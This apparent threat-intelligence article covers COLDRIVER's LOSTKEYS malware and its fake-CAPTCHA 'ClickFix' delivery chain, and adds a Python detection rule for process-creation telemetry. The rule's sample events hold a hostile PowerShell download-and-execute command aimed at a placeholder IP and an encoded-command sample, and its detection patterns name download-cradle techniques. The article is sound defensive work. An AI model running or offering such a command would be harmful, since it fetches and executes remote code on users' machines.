On May 7, 2025, Google's Threat Intelligence Group reported that COLDRIVER, a Russian state-backed cyber espionage group, is deploying a new malware strain it tracks as "LOSTKEYS." The finding is notable because COLDRIVER has historically relied almost entirely on credential phishing; LOSTKEYS shows the group is also willing to put malware on the machines of selected, high-value targets.
Key Features of LOSTKEYS Malware:
Data Exfiltration: LOSTKEYS steals files with a hardcoded list of extensions from a hardcoded list of directories on the infected host.
System Surveillance: It also collects system information and a list of running processes and sends that data back to COLDRIVER-controlled infrastructure.
Staged Deployment (a "ClickFix"-style social-engineering chain):
A lure website presents a fake CAPTCHA to the user.
The page copies a PowerShell command to the user's clipboard and instructs the user to paste and run it (for example, in the Windows Run dialog) to "prove they are human."
That command retrieves the next stage, which in turn fetches the final payload.
The final payload is written to disk and run, and the theft described above begins.
Because the victim launches the first stage by hand, there is no exploit involved; the weak link is the user, and the detectable artifact is an interactive shell (explorer.exe) spawning PowerShell with a remote download in its command line.
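The chain above leaves a consistent shape in endpoint telemetry: a command pasted into the Run dialog is launched by explorer.exe, and the pasted command almost always hides its window and pulls the next stage from a remote host. The following detection heuristic is an added example, not code from Google's report; it runs over constructed process-creation events whose field names (ParentImage, Image, CommandLine) follow Sysmon Event ID 1, while the hostnames, URL and encoded blob are made up for illustration.

```python
"""Flag ClickFix-shaped PowerShell launches in process-creation telemetry.

Added example: the events below are constructed to resemble Sysmon Event ID 1
exports; hosts, IPs and the encoded blob are invented, not real indicators.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample events, "Key=Value | Key=Value" per line.
SAMPLE_EVENTS = [
    # Benign: user opens PowerShell from the Start menu (no arguments).
    "Host=WS01 | ParentImage=C:\\Windows\\explorer.exe | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=\"powershell.exe\"",
    # Benign: scheduled task runs a local script; parent is svchost.exe, not an interactive shell.
    "Host=WS01 | ParentImage=C:\\Windows\\System32\\svchost.exe | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=\"powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1\"",
    # Suspicious: pasted into Win+R (parent explorer.exe), hidden window, remote download cradle, iex.
    "Host=WS02 | ParentImage=C:\\Windows\\explorer.exe | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=\"powershell -w hidden -nop -c iex (New-Object Net.WebClient).DownloadString('http://198.51.100.23/verify')\"",
    # Suspicious: encoded command pasted into Win+R (blob is constructed, not a real sample).
    "Host=WS03 | ParentImage=C:\\Windows\\explorer.exe | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | CommandLine=\"powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=\"",
]

# Child processes a pasted command is expected to land in.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe"}

# Command-line indicators, matched case-insensitively; each hit is reported by name.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("download_cradle", re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|invoke-restmethod|\b(?:iwr|irm)\b", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
]


def parse_event(line: str) -> dict:
    """Parse 'Key=Value | Key=Value' into a dict.

    The CommandLine value may itself contain '=', so split each field on the
    first '=' only, and strip the quotes Sysmon puts around the command line.
    """
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip().strip('"')
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> list[str]:
    """Return the indicator names that fire, or [] if the event is not ClickFix-shaped.

    The base condition is the parent: a command pasted into the Run dialog is
    spawned by explorer.exe. Launches from svchost.exe, task schedulers or
    management agents are ignored here even if their command lines look odd.
    """
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in SUSPICIOUS_CHILDREN:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def detect(lines: list[str]) -> list[dict]:
    """Run classify() over raw event lines and return one alert per suspicious event."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            alerts.append({"host": ev.get("Host"), "indicators": hits, "command": ev.get("CommandLine")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['host']}: {', '.join(alert['indicators'])}")
        print(f"    {alert['command']}")
```

On the constructed input, WS01's two launches are ignored (no indicators, or a non-interactive parent) and WS02 and WS03 are flagged. The parent check is deliberate: the same download cradle launched by a deployment agent is a different investigation, and gating on explorer.exe keeps the rule focused on the user-pasted step that the fake CAPTCHA relies on. In a real deployment, add cmd.exe and mshta.exe as children and feed the rule from your SIEM's process-creation source rather than a list of strings.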
Google published the IP address 165.227.148[.]68 as infrastructure associated with this activity and added the related lure sites to Safe Browsing, so Chrome and other Safe Browsing clients now warn users who reach them. Defenders should treat the IP as a pivot point for hunting rather than a complete blocklist, since COLDRIVER rotates infrastructure between campaigns.
Background on COLDRIVER:
COLDRIVER, also tracked as Callisto, Blue Callisto, BlueCharlie, Star Blizzard, and UNC4057, has been active since at least 2019. The UK and US governments have publicly attributed the group to Russia's Federal Security Service (FSB). It is known for targeting high-profile Western individuals and organizations, including NATO governments and militaries, NGOs, think tanks, journalists, and former intelligence and diplomatic officials. Its operations focus on intelligence collection in support of Russian strategic interests.
In early 2025, COLDRIVER targeted current and former advisors to Western governments, military personnel, and individuals connected to Ukraine. In 2022, the group was reported to have targeted three U.S. nuclear research laboratories with credential-phishing pages, and it was linked to the leak of emails belonging to former British intelligence chief Richard Dearlove and other pro-Brexit figures.
Implications:
The emergence of LOSTKEYS shows that a group best known for credential phishing is prepared to escalate to malware when a target warrants it. Organizations in the governmental and non-governmental sectors that fit COLDRIVER's target profile should treat any web page that asks the user to copy a command and paste it into the Run dialog or a terminal as an attack, alert on PowerShell launched from explorer.exe with remote download or encoded-command arguments, restrict ad hoc PowerShell where the business allows (application control or constrained language mode), and keep Safe Browsing or an equivalent URL-filtering control enabled on user endpoints.